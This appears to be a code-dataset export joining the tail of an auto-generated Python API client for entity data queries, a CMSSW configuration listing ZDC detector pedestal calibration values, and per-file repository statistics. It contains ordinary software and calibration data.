accessing entity fields like 'name', 'label', etc. The list of available fields depends on the entity type; * 'ALARM_FIELD' - similar to entity field, but is used in alarm queries only; Let's review the example: ```json { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ``` ## Value Type and Operations Provides a hint about the data type of the entity field that is defined in the filter key. The value type impacts the list of possible operations that you may use in the corresponding predicate. For example, you may use 'STARTS_WITH' or 'END_WITH', but you can't use 'GREATER_OR_EQUAL' for string values.The following filter value types and corresponding predicate operations are supported: * 'STRING' - used to filter any 'String' or 'JSON' values. Operations: EQUAL, NOT_EQUAL, STARTS_WITH, ENDS_WITH, CONTAINS, NOT_CONTAINS; * 'NUMERIC' - used for 'Long' and 'Double' values. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; * 'BOOLEAN' - used for boolean values. Operations: EQUAL, NOT_EQUAL; * 'DATE_TIME' - similar to numeric, transforms value to milliseconds since epoch. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; ## Filter Predicate Filter Predicate defines the logical expression to evaluate. The list of available operations depends on the filter value type, see above. Platform supports 4 predicate types: 'STRING', 'NUMERIC', 'BOOLEAN' and 'COMPLEX'. The last one allows to combine multiple operations over one filter key. Simple predicate example to check 'value < 100': ```json { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 100, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ``` Complex predicate example, to check 'value < 10 or value > 20': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ``` More complex predicate example, to check 'value < 10 or (value > 50 && value < 60)': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"type\": \"COMPLEX\", \"operation\": \"AND\", \"predicates\": [ { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 50, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 60, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ] } ``` You may also want to replace hardcoded values (for example, temperature > 20) with the more dynamic expression (for example, temperature > 'value of the tenant attribute with key 'temperatureThreshold'). It is possible to use 'dynamicValue' to define attribute of the tenant, customer or user that is performing the API call. See example below: ```json { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\" } }, \"type\": \"NUMERIC\" } ``` Note that you may use 'CURRENT_USER', 'CURRENT_CUSTOMER' and 'CURRENT_TENANT' as a 'sourceType'. The 'defaultValue' is used when the attribute with such a name is not defined for the chosen source. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_entity_data_by_query_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityDataQuery body:
:return: PageDataEntityData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_entity_data_by_query_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entitiesQuery/find', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataEntityData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_entity_timeseries_and_attributes_keys_by_query_using_post(self, timeseries, attributes, **kwargs): # noqa: E501
"""Find Entity Keys by Query # noqa: E501
Uses entity data query (see 'Find Entity Data by Query') to find first 100 entities. Then fetch and return all unique time-series and/or attribute keys. Used mostly for UI hints. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_entity_timeseries_and_attributes_keys_by_query_using_post(timeseries, attributes, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool timeseries: Include all unique time-series keys to the result. (required)
:param bool attributes: Include all unique attribute keys to the result. (required)
:param EntityDataQuery body:
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.find_entity_timeseries_and_attributes_keys_by_query_using_post_with_http_info(timeseries, attributes, **kwargs) # noqa: E501
else:
(data) = self.find_entity_timeseries_and_attributes_keys_by_query_using_post_with_http_info(timeseries, attributes, **kwargs) # noqa: E501
return data
def find_entity_timeseries_and_attributes_keys_by_query_using_post_with_http_info(self, timeseries, attributes, **kwargs): # noqa: E501
"""Find Entity Keys by Query # noqa: E501
Uses entity data query (see 'Find Entity Data by Query') to find first 100 entities. Then fetch and return all unique time-series and/or attribute keys. Used mostly for UI hints. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_entity_timeseries_and_attributes_keys_by_query_using_post_with_http_info(timeseries, attributes, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool timeseries: Include all unique time-series keys to the result. (required)
:param bool attributes: Include all unique attribute keys to the result. (required)
:param EntityDataQuery body:
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['timeseries', 'attributes', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_entity_timeseries_and_attributes_keys_by_query_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'timeseries' is set
if ('timeseries' not in params or
params['timeseries'] is None):
raise ValueError("Missing the required parameter `timeseries` when calling `find_entity_timeseries_and_attributes_keys_by_query_using_post`") # noqa: E501
# verify the required parameter 'attributes' is set
if ('attributes' not in params or
params['attributes'] is None):
raise ValueError("Missing the required parameter `attributes` when calling `find_entity_timeseries_and_attributes_keys_by_query_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'timeseries' in params:
query_params.append(('timeseries', params['timeseries'])) # noqa: E501
if 'attributes' in params:
query_params.append(('attributes', params['attributes'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entitiesQuery/find/keys{?attributes,timeseries}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 206.472093 | 17,286 | 0.657175 | 10,638 | 88,783 | 5.414646 | 0.044369 | 0.015833 | 0.0125 | 0.025 | 0.985157 | 0.983629 | 0.982743 | 0.981059 | 0.978716 | 0.97849 | 0 | 0.024729 | 0.214748 | 88,783 | 429 | 17,287 | 206.95338 | 0.801483 | 0.845455 | 0 | 0.766816 | 0 | 0 | 0.183869 | 0.067883 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040359 | false | 0 | 0.017937 | 0 | 0.116592 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
5cc0956fcd75702693f1393c59132ca0d5e83a62 | 17,041 | py | Python | RecoHI/ZDCRecHit/python/ZDC2018Pedestal_cfg.py | flodamas/cmssw | fff9de2a54e62debab81057f8d6f8c82c2fd3dd6 | [
"Apache-2.0"
] | null | null | null | RecoHI/ZDCRecHit/python/ZDC2018Pedestal_cfg.py | flodamas/cmssw | fff9de2a54e62debab81057f8d6f8c82c2fd3dd6 | [
"Apache-2.0"
] | null | null | null | RecoHI/ZDCRecHit/python/ZDC2018Pedestal_cfg.py | flodamas/cmssw | fff9de2a54e62debab81057f8d6f8c82c2fd3dd6 | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
# Manual Pedestal calibration
# all 0
ZDC2018Pedestal_0 = cms.VPSet(
cms.PSet(
object = cms.untracked.string('hZDCM_EM0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
)
)
# 904 uHTR slot 12, QIE #5 in slot 4, #6 in slot 10
# emap: ZDC904_emap_ext12.txt
# run: 1000031442
ZDC2018Pedestal_904_ext12 = cms.VPSet(
cms.PSet(
object = cms.untracked.string('hZDCM_EM1'),
ped = cms.untracked.vdouble(15.6083, 15.2689, 14.768, 13.3416)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM2'),
ped = cms.untracked.vdouble(9.41336, 12.1918, 8.21728, 9.76649)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM3'),
ped = cms.untracked.vdouble(13.4873, 12.7648, 14.5413, 14.8814)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM4'),
ped = cms.untracked.vdouble(14.7575, 14.451, 17.1683, 14.8702)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM5'),
ped = cms.untracked.vdouble(14.6055, 14.7122, 14.2617, 16.7126)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD1'),
ped = cms.untracked.vdouble(15.0058, 12.404, 14.7046, 14.1515)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD2'),
ped = cms.untracked.vdouble( 14.95, 16.1148, 12.2919, 14.3467)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD3'),
ped = cms.untracked.vdouble(10.8538, 12.112, 11.3263, 10.7855)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM1'),
ped = cms.untracked.vdouble(15.9358, 10.4533, 12.7106, 11.5529)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM2'),
ped = cms.untracked.vdouble(14.7899, 14.5666, 11.2359, 13.4967)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM3'),
ped = cms.untracked.vdouble(17.0179, 14.5213, 11.5068, 15.5748)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM4'),
ped = cms.untracked.vdouble(13.6099, 11.9383, 11.2673, 16.4173)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM5'),
ped = cms.untracked.vdouble(14.3384, 13.0884, 10.5253, 14.6361)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD1'),
ped = cms.untracked.vdouble(13.8815, 11.5781, 11.2892, 15.7391)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD2'),
ped = cms.untracked.vdouble(14.4749, 12.8443, 14.8394, 14.4989)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD3'),
ped = cms.untracked.vdouble(9.06214, 8.06979, 8.12848, 8.59083)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD0'),
ped = cms.untracked.vdouble(21.8017, 16.7815, 21.5617, 17.7388)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD1'),
ped = cms.untracked.vdouble(15.3408, 16.7762, 14.4841, 16.6738)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD2'),
ped = cms.untracked.vdouble(14.2779, 10.0383, 13.255, 10.5414)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD3'),
ped = cms.untracked.vdouble(18.5859, 17.8428, 16.9534, 15.3126)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD4'),
ped = cms.untracked.vdouble(15.1648, 14.6349, 17.8611, 14.5332)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD5'),
ped = cms.untracked.vdouble(14.0309, 14.4929, 13.9492, 11.177)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD6'),
ped = cms.untracked.vdouble(15.1696, 13.4929, 14.924, 14.5378)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD7'),
ped = cms.untracked.vdouble(15.1128, 14.6979, 13.8887, 17.6131)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD8'),
ped = cms.untracked.vdouble(17.8935, 13.9952, 15.6243, 17.344)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD9'),
ped = cms.untracked.vdouble(20.2393, 19.2369, 14.9737, 20.3862)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD10'),
ped = cms.untracked.vdouble(12.0221, 14.3521, 11.9133, 16.073)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD11'),
ped = cms.untracked.vdouble(16.3644, 14.3827, 15.6325, 14.0836)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD12'),
ped = cms.untracked.vdouble(15.4127, 15.1099, 14.5655, 14.3548)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD13'),
ped = cms.untracked.vdouble(11.6072, 11.7433, 10.4341, 14.684)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD14'),
ped = cms.untracked.vdouble(18.1413, 20.189, 20.5513, 17.6956)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD15'),
ped = cms.untracked.vdouble(20.4136, 21.183, 17.9832, 20.5295)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD0'),
ped = cms.untracked.vdouble(15.6852, 17.5086, 18.0853, 14.7496)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD1'),
ped = cms.untracked.vdouble(12.9077, 14.6858, 11.524, 13.0808)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD2'),
ped = cms.untracked.vdouble(19.4074, 16.9448, 17.4224, 18.4837)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD3'),
ped = cms.untracked.vdouble(15.9245, 14.3199, 14.6333, 13.8805)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD4'),
ped = cms.untracked.vdouble(17.3613, 13.8852, 17.6593, 18.1441)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD5'),
ped = cms.untracked.vdouble(16.0604, 16.2478, 16.3608, 17.1693)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD6'),
ped = cms.untracked.vdouble(14.5853, 14.5886, 12.986, 14.681)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD7'),
ped = cms.untracked.vdouble(14.7179, 14.837, 14.9085, 14.705)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD8'),
ped = cms.untracked.vdouble(8.19399, 11.4826, 8.32948, 12.3732)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD9'),
ped = cms.untracked.vdouble(12.0351, 10.728, 11.0728, 9.61176)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD10'),
ped = cms.untracked.vdouble(14.5537, 16.2121, 17.6692, 16.0103)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD11'),
ped = cms.untracked.vdouble(14.6294, 11.0007, 11.5597, 11.4046)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD12'),
ped = cms.untracked.vdouble(13.0648, 11.9332, 11.3372, 12.6258)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD13'),
ped = cms.untracked.vdouble(17.3754, 16.8414, 17.645, 15.86)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD14'),
ped = cms.untracked.vdouble(17.9211, 15.1678, 17.6351, 17.8983)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD15'),
ped = cms.untracked.vdouble(14.7133, 15.586, 14.0089, 16.6532)
)
)
| 28.834179 | 66 | 0.632709 | 2,536 | 17,041 | 4.192823 | 0.113565 | 0.325026 | 0.054171 | 0.216684 | 0.885733 | 0.878962 | 0.877833 | 0.877833 | 0.877833 | 0.872567 | 0 | 0.122317 | 0.163312 | 17,041 | 590 | 67 | 28.883051 | 0.623439 | 0.007335 | 0 | 0.822719 | 0 | 0 | 0.085522 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001721 | 0 | 0.001721 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
7a54e928b95a4724e09cebb0a14b917aca783e10 | 3,086 | py | Python | tests/test_1.py | PhilipHarries/webms_blogservice | d052f93a1b5fad62f19c0e5fb48e9646ceafd220 | [
"MIT"
] | null | null | null | tests/test_1.py | PhilipHarries/webms_blogservice | d052f93a1b5fad62f19c0e5fb48e9646ceafd220 | [
"MIT"
